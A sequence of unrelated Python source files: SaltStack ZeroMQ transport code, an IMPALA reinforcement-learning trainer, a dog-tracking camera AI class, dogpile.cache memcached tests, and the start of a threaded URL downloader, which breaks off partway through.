stream.send(self.serial.dumps(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
)))
else:
log.error('Unknown req_fun {0}'.format(req_fun))
# always attempt to return an error to the minion
stream.send('Server-side exception handling payload')
raise tornado.gen.Return()
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
'''
Encapsulate synchronous operations for a publisher channel
'''
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
def connect(self):
return tornado.gen.sleep(5)
def _publish_daemon(self):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.appendproctitle(self.__class__.__name__)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
# if 2.1 >= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000))
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info('Starting the Salt Publisher on {0}'.format(pub_uri))
pub_sock.bind(pub_uri)
# Securely create socket
log.info('Starting the Salt Puller on {0}'.format(pull_uri))
old_umask = os.umask(0o177)
try:
pull_sock.bind(pull_uri)
finally:
os.umask(old_umask)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
package = pull_sock.recv()
unpacked_package = salt.payload.unpackage(package)
payload = unpacked_package['payload']
if self.opts['zmq_filtering']:
# if you have a specific topic list, use that
if 'topic_lst' in unpacked_package:
for topic in unpacked_package['topic_lst']:
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = hashlib.sha1(topic).hexdigest()
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
# otherwise its a broadcast
else:
# TODO: constants file for "broadcast"
pub_sock.send('broadcast', flags=zmq.SNDMORE)
pub_sock.send(payload)
else:
pub_sock.send(payload)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if pull_sock.closed is False:
pull_sock.setsockopt(zmq.LINGER, 1)
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
'''
process_manager.add_process(self._publish_daemon)
def publish(self, load):
'''
Publish "load" to minions
:param dict load: A load to be sent across the wire to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
pub_sock.send(self.serial.dumps(int_payload))
# TODO: unit tests!
class AsyncReqMessageClient(object):
'''
This class wraps the underylying zeromq REQ socket and gives a future-based
interface to sending and recieving messages. This works around the primary
limitation of serialized send/recv on the underlying socket by queueing the
message sends in this class. In the future if we decide to attempt to multiplex
we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial
'''
def __init__(self, opts, addr, linger=0, io_loop=None):
'''
Create an asynchronous message client
:param dict opts: The salt opts dictionary
:param str addr: The interface IP address to bind to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
'''
self.opts = opts
self.addr = addr
self.linger = linger
self.io_loop = io_loop or zmq.eventloop.ioloop.ZMQIOLoop.current()
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
# TODO: timeout all in-flight sessions, or error
def destroy(self):
if hasattr(self, 'stream') and self.stream is not None:
# TODO: Optionally call stream.close() on newer pyzmq? It is broken on some.
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.socket.close()
self.context.term()
def __del__(self):
self.destroy()
def _init_socket(self):
if hasattr(self, 'stream'):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, 5000
)
self._set_tcp_keepalive()
if self.addr.startswith('tcp://['):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, 'IPV6'):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, 'IPV4ONLY'):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop)
def _set_tcp_keepalive(self):
'''
Ensure that TCP keepalives are set for the ReqServer.
Warning: Failure to set TCP keepalives can result in frequent or unexpected
disconnects!
'''
if hasattr(zmq, 'TCP_KEEPALIVE') and self.opts:
if 'tcp_keepalive' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
if 'tcp_keepalive_idle' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
if 'tcp_keepalive_cnt' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
if 'tcp_keepalive_intvl' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
@tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue.pop(0)
future = self.send_future_map[message]
# send
def mark_future(msg):
if not future.done():
future.set_result(self.serial.loads(msg[0]))
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except: # pylint: disable=W0702
self._init_socket() # re-init the zmq socket (no other way in zmq)
continue
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
'''
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
'''
del self.send_timeout_map[message]
self.send_future_map.pop(message).set_exception(SaltReqTimeoutError('Message timed out'))
def send(self, message, timeout=None, callback=None):
'''
Return a future which will be completed when the message has a response
'''
message = self.serial.dumps(message)
future = tornado.concurrent.Future()
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
class ZeroMQSocketMonitor(object):
__EVENT_MAP = None
def __init__(self, socket):
'''
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
'''
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt['description'] = self.event_map[evt['event']]
log.debug("ZeroMQ event: {0}".format(evt))
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
|
learn.py
|
import tensorflow as tf
from multiprocessing import Process, Queue
import os
import datetime
import numpy as np
from impala.model import ImpalaModel, Learner, Actor
from impala.replay_buffer import UniformBuffer, PrioritizedBuffer
from common.logger import TensorBoardWriter, CSVWriter, CombinedWriter
import utils as U
from impala.py_process import PyProcessHook
def get_default_parameters():
return {
'batch_size': 2,
'entropy_scale': 0.1,
'horizon': 256,
'learning_rate': 2.0e-4,
'max_steps': 50000,
'rho_clip': 2.0,
'sequence_length': 128
}
def parameter_grid_search():
"""
generator function that yields sets of parameters
Usage:
for param_kws in parameter_search():
print(param_kws)
:return: yield, dict
"""
horizons = [256]
batch_sizes = [16]
sequence_lengths = [16]
learning_rates = [2.0e-4, 4.0e-4]
entropy_scales = [1e-1, 1e-2, 1e-3]
for bs in batch_sizes:
for hor in horizons:
for seq_len in sequence_lengths:
for es in entropy_scales:
for lr in learning_rates:
yield dict(batch_size=bs, entropy_scale=es, horizon=hor,
learning_rate=lr, sequence_length=seq_len)
class NormalizeObservationsRewards:
def __init__(self, observation_space, clip_value=10.0, epsilon=1e-8):
self.obs_shape = observation_space.shape
self.ob_rms = U.TfRunningMeanStd(shape=observation_space.shape, scope='RunningMeanStd/Obs')
self.ret_rms = U.TfRunningMeanStd(shape=(), scope='RunningMeanStd/Rew')
self.clip = clip_value
self.epsilon = epsilon
def normalize_and_update(self, obs, rewards):
""" normalize inputs and update internal running mean/std parameters """
return self._ob_filter(obs), self._reward_filter(rewards.flatten())
def normalize(self, obs, rewards, update_internal_with_session=None):
""" only normalize inputs and rewards """
if update_internal_with_session:
self.get_values_from_tf_graph(session=update_internal_with_session)
flatten_obs = obs.reshape((-1, *self.obs_shape))
ob = np.clip((flatten_obs - self.ob_rms.mean) / np.sqrt(self.ob_rms.var + self.epsilon), -self.clip, self.clip)
rew = np.clip((rewards.flatten() - self.ret_rms.mean) / np.sqrt(self.ret_rms.var + self.epsilon), -self.clip, self.clip)
return ob, rew
def normalize_observation(self, obs):
""" only normalize inputs"""
return np.clip((obs - self.ob_rms.mean) / np.sqrt(self.ob_rms.var + self.epsilon), -self.clip, self.clip)
def _ob_filter(self, obs):
# flatten observations for calculating mean and std along axis=0
flatten_obs = obs.reshape((-1, *self.obs_shape))
self.ob_rms.update(flatten_obs)
normed_flat_obs = np.clip((flatten_obs - self.ob_rms.mean) / np.sqrt(self.ob_rms.var + self.epsilon), -self.clip, self.clip)
return normed_flat_obs
def _reward_filter(self, rewards):
self.ret_rms.update(rewards)
rew = np.clip((rewards - self.ret_rms.mean) / np.sqrt(self.ret_rms.var + self.epsilon), -self.clip, self.clip)
return rew
def setup(self, session=None):
""" get_values_from_tf_graph and copy into classes"""
self.ob_rms.get_values_from_tf_graph(session)
self.ret_rms.get_values_from_tf_graph(session)
def get_values_from_tf_graph(self, session=None):
""" get_values_from_tf_graph and copy into classes"""
self.ob_rms.get_values_from_tf_graph(session)
self.ret_rms.get_values_from_tf_graph(session)
def update_ops(self, obs, rewards, session):
flatten_obs = obs.reshape((-1, *self.obs_shape))
if not session.should_stop():
self.ob_rms.update(flatten_obs, session=session)
self.ret_rms.update(rewards.flatten(), session=session)
def training(cluster,
job_name,
task_index,
queue,
kwargs,
horizon,
sequence_length,
learning_rate,
entropy_scale,
max_steps,
batch_size):
"""
Trains the architecture
learner updates the parameters of the NN according to Actor-Critic
actors roll-out policy and put trajectories into queue
:param cluster:
:param job_name:
:param task_index:
:param queue:
:param kwargs:
:param horizon:
:param sequence_length:
:param learning_rate:
:param entropy_scale:
:param max_steps:
:param batch_size:
:return:
"""
print('==============================')
print('Parsed Parameters for Training')
print('============================== \n')
print('Learning Rate: {}'.format(learning_rate))
print('Horizon: {}'.format(horizon))
print('Sequence Length: {}'.format(sequence_length))
print('Entropy Scale: {}'.format(entropy_scale))
print('Maximum Steps: {}'.format(max_steps))
print('\n==============================')
print('Started server: job_name={}, task_index={}'.format(job_name, task_index))
date_string = datetime.datetime.now().strftime("%Y_%m_%d__%H_%M")
log_directory = os.path.join('/tmp/impala', date_string)
is_chief = (job_name == 'learner')
server = tf.train.Server(cluster, job_name=job_name, task_index=task_index)
device_name = '/job:{}/task:{}'.format(job_name, task_index)
print('Place on tf model on device:', device_name)
with tf.device(tf.train.replica_device_setter(worker_device=device_name, cluster=cluster)):
# create model ...
env = U.make_env(**kwargs) # share running mean ops across devices
normalizer = NormalizeObservationsRewards(observation_space=env.observation_space)
if is_chief: # only learners needs to build loss
with tf.device('/gpu'):
model = ImpalaModel(observation_shape=env.observation_space.shape,
n_actions=env.action_space.n,
learning_rate=learning_rate,
entropy_scale=entropy_scale)
model.build_loss()
model.build_trainer()
trajectory_buffer = PrioritizedBuffer(obs_shape=env.observation_space.shape,
batch_size=batch_size,
horizon=horizon,
sequence_length=sequence_length,
size=1000)
logs = CombinedWriter(dir=log_directory)
print('Logging to', log_directory)
U.dump_dict_as_json(kwargs, directory=log_directory, file_name='configuration')
worker = Learner(model=model, queue=queue, buffer=trajectory_buffer, logger=logs, norm=normalizer, **kwargs)
else:
with tf.device('/cpu'): # pin workers to CPU
model = ImpalaModel(observation_shape=env.observation_space.shape,
n_actions=env.action_space.n,
learning_rate=learning_rate,
entropy_scale=entropy_scale)
worker = Actor(model=model, env=env, queue=queue, normalizer=normalizer, **kwargs)
# The StopAtStepHook handles stopping after running given steps.
# max_steps = 10000
hooks = [tf.train.StopAtStepHook(last_step=max_steps)] # , PyProcessHook()]
# TODO adjust tf.Config for flexible node placement on GPUs
tf_config = tf.ConfigProto(allow_soft_placement=True, # soft placement to allow flexible training on CPU/GPU
intra_op_parallelism_threads=1, # speed up training time
inter_op_parallelism_threads=1) # number of physical cores
# The MonitoredTrainingSession takes care of session initialization,
# restoring from a checkpoint, saving to a checkpoint, and closing when done
# or an error occurs.
with tf.train.MonitoredTrainingSession(master=server.target,
is_chief=is_chief,
checkpoint_dir=os.path.join("/tmp/impala/", date_string),
config=tf_config,
save_checkpoint_secs=120,
hooks=hooks) as mon_sess:
normalizer.setup(session=mon_sess)
while not mon_sess.should_stop():
# learner batches from experience buffer and updates policy network
# actors only enqueue trajectories into the FIFO queue
worker.work(session=mon_sess)
print('{}:{} wants to join ... Training finished!'.format(job_name, task_index))
if is_chief:
logs.close()
server.join()
def play(args, **kwargs):
""" play mode """
print(args.dir)
assert args.dir, 'Please provide directory where checkpoint file is located'
kwargs['normalize'] = True
normed_env = U.make_env(**kwargs) # use env.setup() after session creation to apply mean/std to obs and rewards
model = ImpalaModel(observation_shape=normed_env.observation_space.shape,
n_actions=normed_env.action_space.n, learning_rate=0.01, entropy_scale=0.0)
# max_steps = 10000
# hooks = [tf.train.StopAtStepHook(last_step=max_steps)] # , PyProcessHook()]
print('Restore from:', args.dir)
with tf.train.SingularMonitoredSession(checkpoint_dir=args.dir) as sess:
normed_env.setup(session=sess) # restore values for running mean/std
print('Restored from global step:', sess.run(model.global_step))
try:
done = False
obs = normed_env.reset()
print(obs)
while not done:
normed_env.render()
action, _ = model.get_action_and_prob(session=sess, observation=obs)
obs, reward, done, info = normed_env.step(action)
except KeyboardInterrupt:
print('got KeyboardInterrupt')
finally:
pass
def main(args, **kwargs):
print('--> Using the following configuration:')
print(kwargs)
num_actors = 2
cluster = tf.train.ClusterSpec({
"worker": ['localhost:{}'.format(8000 + i) for i in range(num_actors)],
"learner": ["localhost:9000"]
})
queue = Queue(maxsize=100)
bs = kwargs['batch_size']
horizon = kwargs['horizon']
lr = kwargs['learning_rate']
es = kwargs['entropy_scale']
max_steps = kwargs['max_steps']
seq_len = kwargs['sequence_length']
processes = []
# define processes as daemon so that children terminate when parent crashes
params = (cluster, 'learner', 0, queue, kwargs, horizon, seq_len, lr, es, max_steps, bs)
p = Process(target=training, args=params)
p.daemon = True
p.start()
processes.append(p)
for actor_id in range(num_actors): # create worker processes
params = (cluster, 'worker', actor_id, queue, kwargs, horizon, seq_len, lr, es, max_steps, bs)
p = Process(target=training, args=params)
p.daemon = True
p.start()
processes.append(p)
print('ALL PROCESSES STARTED')
# time.sleep(5)
for p in processes:
p.join()
print('ALL JOINED')
if __name__ == '__main__':
shared_job_device = '/job:learner/task:0'
main(shared_job_device)
|
dogcamaibase.py
|
from dogcamlogger import DogCamLogger, DCLogLevel
import threading
import time
import queue
import cv2
class DogCamAIBase():
debugDisplay = False
# Queue of movement commands necessary for the robot.
# The main file handles the interclass processing of these commands.
commandQueue = queue.Queue()
# The thread object
_thread = None
# The current image to display
_image = None
# The image to work on next
__pendingImage = None
# Width of the image to process
_width = 0
# Height of the image to process
_height = 0
# Thickness of the borders
_boundsX = 0
# Thickness of the borders
_boundsY = 0
# Thread flags
_runningThread = False
# AI Confidence levels
_minConfidence = 0
# If we should log match data
_logMatches = False
# Tilt Throttling
_blockTiltMove = False
_LastTiltMoveTime = 0
_TiltMoveCooldown = 0.75
_ThrottleTiltMovement = False
def __init__(self):
DogCamLogger.Log("AI: Allocated", DCLogLevel.Verbose)
def Initialize(self, boundsXSize=10, boundsYSize=10, minimumConfidence=0.3, displayOut=False,
detectionID=0, logMatches=False, throttleTilt=False, tiltCooldown=0.75):
self.debugDisplay = displayOut
self._boundsX = int(boundsXSize)
self._boundsY = int(boundsYSize)
self._minConfidence = float(minimumConfidence)
self._image = None
self._logMatches = logMatches
self.__pendingImage = None
self._targetID = detectionID
self._ThrottleTiltMovement = throttleTilt
self._TiltMoveCooldown = tiltCooldown
self._thread = threading.Thread(target=self.__Update)
DogCamLogger.Log("AI: Initialized", DCLogLevel.Debug)
# Each AI model needs to implement this, pull the current working imge from the
# self._image class member.
def _ProcessImageInternal(self):
raise NotImplementedError
def SetDimensions(self, W, H):
self._width = int(W)
self._height = int(H)
DogCamLogger.Log(f"AI: Resolution is {self._width}x{self._height}")
def PushImage(self, image):
if image is None:
DogCamLogger.Log("AI: Image pushed was empty", DCLogLevel.Debug)
return
self.__pendingImage = image
def __Update(self):
# Create Debug window
if self.debugDisplay:
cv2.startWindowThread()
cv2.namedWindow("Output", cv2.WINDOW_NORMAL)
cv2.resizeWindow("Output", (320, 240))
while self._runningThread:
if self.__pendingImage is not None:
self._image = self.__pendingImage
self.__pendingImage = None
self.__ProcessImage()
self._image = None
time.sleep(0.0001)
cv2.destroyAllWindows()
def Start(self):
DogCamLogger.Log("AI: AI Processing Started", DCLogLevel.Notice)
self._runningThread = True
self._thread.start()
def Stop(self):
if self._runningThread:
DogCamLogger.Log("AI: AI Processing Halted", DCLogLevel.Warn)
self._runningThread = False
self._thread.join()
def __ProcessImage(self):
# Unlikely, but we'll be safe anyways
if self._image is None:
DogCamLogger.Log("AI: Skipping blank image", DCLogLevel.Debug)
return
ProcessingTime=time.time()
# Handle tilt throttling
if (ProcessingTime - self._LastTiltMoveTime) > self._TiltMoveCooldown:
self._blockTiltMove = False
DogCamLogger.Log(f"AI: Processing image at {ProcessingTime}!", DCLogLevel.Verbose)
self._ProcessImageInternal()
ProcessingTime=time.time()-ProcessingTime
if self.debugDisplay:
DogCamLogger.Log("AI: Displaying image", DCLogLevel.Debug)
cv2.imshow("Output", self._image)
DogCamLogger.Log(f"AI: Image processed in {ProcessingTime} seconds", DCLogLevel.Verbose)
def _LogObjectFound(self, objectID, confidence):
if confidence >= self._minConfidence and self._logMatches is True:
DogCamLogger.Log(f"AI: Found object {objectID} with confidence {confidence}")
def _DrawBoundingBox(self):
# Draw the edge bounding box around the image (this is the boundaries of the detection square)
# Anything within this box is considered to be in focus.
cv2.rectangle(self._image, (self._boundsX, self._boundsY), (self._width-self._boundsX,
self._height-self._boundsY), (100,0,100), 4)
def _HandleObjectDetectionResult(self, left, right, top, bottom):
# Draw a bounding box around the object we've detected
cv2.rectangle(self._image, (left, top), (right, bottom), (100,25,0), 2)
# Do inverse AABB bounding collision testing
BoxTop = (top < self._boundsY)
BoxBottom = (bottom > self._height-self._boundsY)
BoxLeft = (left <= self._boundsX)
BoxRight = (right > self._width-self._boundsX)
# If the dog is in a wide shot
# (meaning they take up the left and right collision at the same time)
# don't attempt to over adjust
if BoxLeft ^ BoxRight:
if BoxLeft:
self.commandQueue.put_nowait("left")
else:
self.commandQueue.put_nowait("right")
# Same as the above but in portrait
if BoxTop ^ BoxBottom:
if self._blockTiltMove is False:
if BoxTop:
self.commandQueue.put_nowait("top")
else:
self.commandQueue.put_nowait("bottom")
self._LastTiltMoveTime = time.time()
# Handle throttling tilting movement
if self._ThrottleTiltMovement is True:
self._blockTiltMove = True
|
test_memcached_backend.py
|
import os
from threading import Thread
import time
from unittest import TestCase
import weakref
import pytest
from dogpile.cache.backends.memcached import GenericMemcachedBackend
from dogpile.cache.backends.memcached import MemcachedBackend
from dogpile.cache.backends.memcached import PylibmcBackend
from . import eq_
from ._fixtures import _GenericBackendTest
from ._fixtures import _GenericMutexTest
MEMCACHED_PORT = os.getenv("DOGPILE_MEMCACHED_PORT", "11211")
MEMCACHED_URL = "127.0.0.1:%s" % MEMCACHED_PORT
expect_memcached_running = bool(os.getenv("DOGPILE_MEMCACHED_PORT"))
LOCK_TIMEOUT = 1
class _TestMemcachedConn(object):
@classmethod
def _check_backend_available(cls, backend):
try:
client = backend._create_client()
client.set("x", "y")
assert client.get("x") == "y"
except Exception:
if not expect_memcached_running:
pytest.skip(
"memcached is not running or "
"otherwise not functioning correctly"
)
else:
raise
class _NonDistributedMemcachedTest(_TestMemcachedConn, _GenericBackendTest):
region_args = {"key_mangler": lambda x: x.replace(" ", "_")}
config_args = {"arguments": {"url": MEMCACHED_URL}}
class _DistributedMemcachedWithTimeoutTest(
_TestMemcachedConn, _GenericBackendTest
):
region_args = {"key_mangler": lambda x: x.replace(" ", "_")}
config_args = {
"arguments": {
"url": MEMCACHED_URL,
"distributed_lock": True,
"lock_timeout": LOCK_TIMEOUT,
}
}
class _DistributedMemcachedTest(_TestMemcachedConn, _GenericBackendTest):
region_args = {"key_mangler": lambda x: x.replace(" ", "_")}
config_args = {
"arguments": {"url": MEMCACHED_URL, "distributed_lock": True}
}
class _DistributedMemcachedMutexTest(_TestMemcachedConn, _GenericMutexTest):
config_args = {
"arguments": {"url": MEMCACHED_URL, "distributed_lock": True}
}
class _DistributedMemcachedMutexWithTimeoutTest(
_TestMemcachedConn, _GenericMutexTest
):
config_args = {
"arguments": {
"url": MEMCACHED_URL,
"distributed_lock": True,
"lock_timeout": LOCK_TIMEOUT,
}
}
class PylibmcTest(_NonDistributedMemcachedTest):
backend = "dogpile.cache.pylibmc"
class PylibmcDistributedTest(_DistributedMemcachedTest):
backend = "dogpile.cache.pylibmc"
class PylibmcDistributedMutexTest(_DistributedMemcachedMutexTest):
backend = "dogpile.cache.pylibmc"
class BMemcachedSkips(object):
def test_threaded_dogpile(self):
pytest.skip("bmemcached is too unreliable here")
def test_threaded_get_multi(self):
pytest.skip("bmemcached is too unreliable here")
def test_mutex_threaded_dogpile(self):
pytest.skip("bmemcached is too unreliable here")
def test_mutex_threaded(self):
pytest.skip("bmemcached is too unreliable here")
class BMemcachedTest(BMemcachedSkips, _NonDistributedMemcachedTest):
backend = "dogpile.cache.bmemcached"
class BMemcachedDistributedWithTimeoutTest(
BMemcachedSkips, _DistributedMemcachedWithTimeoutTest
):
backend = "dogpile.cache.bmemcached"
class BMemcachedDistributedTest(BMemcachedSkips, _DistributedMemcachedTest):
backend = "dogpile.cache.bmemcached"
class BMemcachedDistributedMutexTest(
BMemcachedSkips, _DistributedMemcachedMutexTest
):
backend = "dogpile.cache.bmemcached"
class BMemcachedDistributedMutexWithTimeoutTest(
BMemcachedSkips, _DistributedMemcachedMutexWithTimeoutTest
):
backend = "dogpile.cache.bmemcached"
class MemcachedTest(_NonDistributedMemcachedTest):
backend = "dogpile.cache.memcached"
class MemcachedDistributedTest(_DistributedMemcachedTest):
backend = "dogpile.cache.memcached"
class MemcachedDistributedMutexTest(_DistributedMemcachedMutexTest):
backend = "dogpile.cache.memcached"
class MockGenericMemcachedBackend(GenericMemcachedBackend):
def _imports(self):
pass
def _create_client(self):
return MockClient(self.url)
class MockMemcacheBackend(MemcachedBackend):
def _imports(self):
pass
def _create_client(self):
return MockClient(self.url)
class MockPylibmcBackend(PylibmcBackend):
def _imports(self):
pass
def _create_client(self):
return MockClient(
self.url, binary=self.binary, behaviors=self.behaviors
)
class MockClient(object):
clients = set()
def __init__(self, *arg, **kw):
self.arg = arg
self.kw = kw
self.canary = []
self._cache = {}
self.clients.add(weakref.ref(self, MockClient._remove))
@classmethod
def _remove(cls, ref):
cls.clients.remove(ref)
@classmethod
def number_of_clients(cls):
return len(cls.clients)
def get(self, key):
return self._cache.get(key)
def set(self, key, value, **kw):
self.canary.append(kw)
self._cache[key] = value
def delete(self, key):
self._cache.pop(key, None)
class PylibmcArgsTest(TestCase):
def test_binary_flag(self):
backend = MockPylibmcBackend(arguments={"url": "foo", "binary": True})
eq_(backend._create_client().kw["binary"], True)
def test_url_list(self):
backend = MockPylibmcBackend(arguments={"url": ["a", "b", "c"]})
eq_(backend._create_client().arg[0], ["a", "b", "c"])
def test_url_scalar(self):
backend = MockPylibmcBackend(arguments={"url": "foo"})
eq_(backend._create_client().arg[0], ["foo"])
def test_behaviors(self):
backend = MockPylibmcBackend(
arguments={"url": "foo", "behaviors": {"q": "p"}}
)
eq_(backend._create_client().kw["behaviors"], {"q": "p"})
def test_set_time(self):
backend = MockPylibmcBackend(
arguments={"url": "foo", "memcached_expire_time": 20}
)
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{"time": 20}])
def test_set_min_compress_len(self):
backend = MockPylibmcBackend(
arguments={"url": "foo", "min_compress_len": 20}
)
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{"min_compress_len": 20}])
def test_no_set_args(self):
backend = MockPylibmcBackend(arguments={"url": "foo"})
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{}])
class MemcachedArgstest(TestCase):
def test_set_time(self):
backend = MockMemcacheBackend(
arguments={"url": "foo", "memcached_expire_time": 20}
)
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{"time": 20}])
def test_set_min_compress_len(self):
backend = MockMemcacheBackend(
arguments={"url": "foo", "min_compress_len": 20}
)
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{"min_compress_len": 20}])
class LocalThreadTest(TestCase):
def setUp(self):
import gc
gc.collect()
eq_(MockClient.number_of_clients(), 0)
def test_client_cleanup_1(self):
self._test_client_cleanup(1)
def test_client_cleanup_3(self):
self._test_client_cleanup(3)
def test_client_cleanup_10(self):
self._test_client_cleanup(10)
def _test_client_cleanup(self, count):
backend = MockGenericMemcachedBackend(arguments={"url": "foo"})
canary = []
flag = [False]
def f(delay):
backend._clients.memcached
canary.append(MockClient.number_of_clients())
while not flag[0]:
time.sleep(0.02)
threads = [Thread(target=f, args=(count - i,)) for i in range(count)]
for t in threads:
t.start()
flag[0] = True
for t in threads:
t.join()
eq_(canary, [i + 1 for i in range(count)])
import gc
gc.collect()
eq_(MockClient.number_of_clients(), 0)
|
direct_downloader.py
|
# Written by: Derek Santos
# 3rd Party Modules
import requests
# Python Modules
import os
import re
from threading import Thread, active_count
from queue import Queue
import shutil
import logging
from time import sleep
""" Setting up logging """
LOG_FORMAT = "[%(levelname)s] %(asctime)s - %(message)s"
logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
class Download_Manager():
def __init__(self, list_of_urls: list, threads: int, directory_path: str):
# Setting up queue
self.queue = Queue()
# Number of threads
self.number_of_threads = threads
# Directory downloading to
self.directory_path = directory_path
# Putting all urls into the queue
for url in list_of_urls:
# If url is blank, continue
if url == '' or url == ' ':
continue
self.queue.put(url)
def start(self):
""" Start the threads to download urls within the queue """
# Setting up thread
